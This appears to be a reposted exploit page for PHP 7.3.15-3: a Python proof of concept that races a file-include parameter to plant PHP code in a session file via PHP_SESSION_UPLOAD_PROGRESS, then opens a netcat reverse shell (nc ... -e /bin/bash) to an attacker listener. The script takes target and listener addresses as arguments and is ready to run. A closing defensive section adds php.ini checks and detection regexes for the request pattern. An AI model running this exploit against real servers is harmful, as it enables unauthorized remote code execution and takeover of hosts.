
TheHackerWorld Official

PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection

# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This PoC abuses PHP_SESSION_UPLOAD_PROGRESS and then triggers a race condition to get remote code execution; the script returns a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :

python3 poc.py <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337

"""
import requests
import threading
import datetime
import sys

x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds

def fuzz():
	targetIP = sys.argv[1]
	listnerIP = sys.argv[2]
	listnerPORT = sys.argv[3]
	global newDatetime
	while True:
		try:
			if datetime.datetime.now() > newDatetime:
				exit()
			# proxies = {
			#     "http": "http://127.0.0.1:8080",
			#    	"https": "https://127.0.0.1:8080",
			#    	}
			sessionName = "SiLvER"
			url = targetIP
			s = requests.Session()
			cookies = {'PHPSESSID': sessionName}
			files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
			# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
			params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
			x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
		
		except Exception as error:
			print(error)
			exit()
def main():
	print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
	threads = []
	for _ in range(20):
		t = threading.Thread(target=fuzz)
		t.start()
		threads.append(t)
	for thread in threads:
		thread.join()

if __name__ == "__main__":
	if len(sys.argv) < 4:
		print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
		print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
		print("\n(=) By SiLvER \n")
		exit()
	else:
		main()
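From the defender's side, the two things worth checking for the technique the PoC relies on are the php.ini upload-progress settings and the request shape it sends (a path parameter naming a session file plus a multipart field called PHP_SESSION_UPLOAD_PROGRESS that contains PHP code). The following is an added example, not part of the original post; `parse_ini`, `audit_upload_progress`, `inspect_request` and the `SAMPLE_*` inputs are all constructed here for illustration.

```python
import re
from typing import Dict, List

# Constructed php.ini fragment (not from the original post) showing the stock defaults.
SAMPLE_INI = """
session.upload_progress.enabled = On   ; default; Off removes this attack surface
session.upload_progress.cleanup = On   ; default; the PoC races this cleanup
session.save_path = "/var/lib/php/sessions"
"""

# Constructed request shaped like the PoC's: an include-style path parameter pointing
# at a session file, plus a multipart field named PHP_SESSION_UPLOAD_PROGRESS.
SAMPLE_PARAMS = {"lfi": "/var/lib/php/sessions/sess_abc123"}
SAMPLE_FIELDS = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php /* constructed */ ?>", "file": "x"}

SESS_FILE_RE = re.compile(r"(?:^|/)sess_[A-Za-z0-9,-]+$")
PHP_CODE_RE = re.compile(r"<\?(?:php|=)|`", re.IGNORECASE)

def parse_ini(ini_text: str) -> Dict[str, str]:
    """Minimal key=value parser: ';' starts a comment, keys and values are lower-cased."""
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" in line:
            key, val = (part.strip().strip('"') for part in line.split("=", 1))
            settings[key.lower()] = val.lower()
    return settings

def audit_upload_progress(ini_text: str) -> List[str]:
    """Flag settings that let a client write chosen bytes into its own session file."""
    s = parse_ini(ini_text)
    findings = []
    if s.get("session.upload_progress.enabled", "1") in ("1", "on", "true"):
        findings.append("session.upload_progress.enabled is On (set Off if the app does not use it)")
        if s.get("session.upload_progress.cleanup", "1") in ("1", "on", "true"):
            findings.append("cleanup=On only narrows the window; the data still reaches disk mid-upload")
    return findings

def inspect_request(params: Dict[str, str], fields: Dict[str, str]) -> List[str]:
    """Detection check for the request shape the PoC sends; returns human-readable findings."""
    findings = []
    progress = fields.get("PHP_SESSION_UPLOAD_PROGRESS", "")
    if PHP_CODE_RE.search(progress):
        findings.append("PHP_SESSION_UPLOAD_PROGRESS field carries PHP code")
    for name, value in params.items():
        if SESS_FILE_RE.search(value):
            findings.append(f"parameter {name!r} points at a session file: {value}")
    return findings
```

The real fix is removing the file-include flaw; the ini audit only tells you whether the session file is a reachable write target while that flaw exists.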